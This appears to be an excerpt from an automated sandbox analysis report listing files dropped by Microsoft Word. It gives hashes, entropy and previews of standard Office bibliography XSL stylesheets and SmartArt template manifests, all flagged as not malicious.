                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):314
                                                                                                                                                Entropy (8bit):3.5230842510951934
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                                SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                                SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                                SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: ieee2006officeonline.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):294178
                                                                                                                                                Entropy (8bit):4.977758311135714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.4670546921349774
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                                MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                                SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                                SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                                SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: ThemePictureAlternatingAccent.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5630
                                                                                                                                                Entropy (8bit):7.87271654296772
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):258
                                                                                                                                                Entropy (8bit):3.4692172273306268
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                                MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                                SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                                SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                                SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: pictureorgchart.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7370
                                                                                                                                                Entropy (8bit):7.9204386289679745
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):3.523917709458511
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]..OriginalName: chicago.xsl..Component: WordFiles..ReqVer: 14..Executable: {WD}..StoreLocation: {My Templates}..Command: /f {FilePath}....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):296658
                                                                                                                                                Entropy (8bit):5.000002997029767
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):333258
                                                                                                                                                Entropy (8bit):4.654450340871081
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):328
                                                                                                                                                Entropy (8bit):3.541819892045459
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):302
                                                                                                                                                Entropy (8bit):3.537169234443227
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):217137
                                                                                                                                                Entropy (8bit):5.068335381017074
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):262
                                                                                                                                                Entropy (8bit):3.4901887319218092
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]..OriginalName: RadialPictureList.glox..Component: WordFiles..ReqVer: 14..StoreLocation: {My Templates}\SmartArt Graphics....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5596
                                                                                                                                                Entropy (8bit):7.875182123405584
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.538396048757031
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]..OriginalName: sist02.xsl..Component: WordFiles..ReqVer: 14..Executable: {WD}..StoreLocation: {My Templates}..Command: /f {FilePath}....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):250983
                                                                                                                                                Entropy (8bit):5.057714239438731
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):260
                                                                                                                                                Entropy (8bit):3.494357416502254
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6193
                                                                                                                                                Entropy (8bit):7.855499268199703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):256
                                                                                                                                                Entropy (8bit):3.4842773155694724
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                                MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                                SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                                SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                                SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):11380
                                                                                                                                                Entropy (8bit):7.891971054886943
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):238
                                                                                                                                                Entropy (8bit):3.472155835869843
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                                MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                                SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                                SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                                SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5151
                                                                                                                                                Entropy (8bit):7.859615916913808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.5280239200222887
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                                SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                                SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                                SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268317
                                                                                                                                                Entropy (8bit):5.05419861997223
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.438490642908344
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                                SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                                SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                                SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34415
                                                                                                                                                Entropy (8bit):7.352974342178997
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                Malicious:false
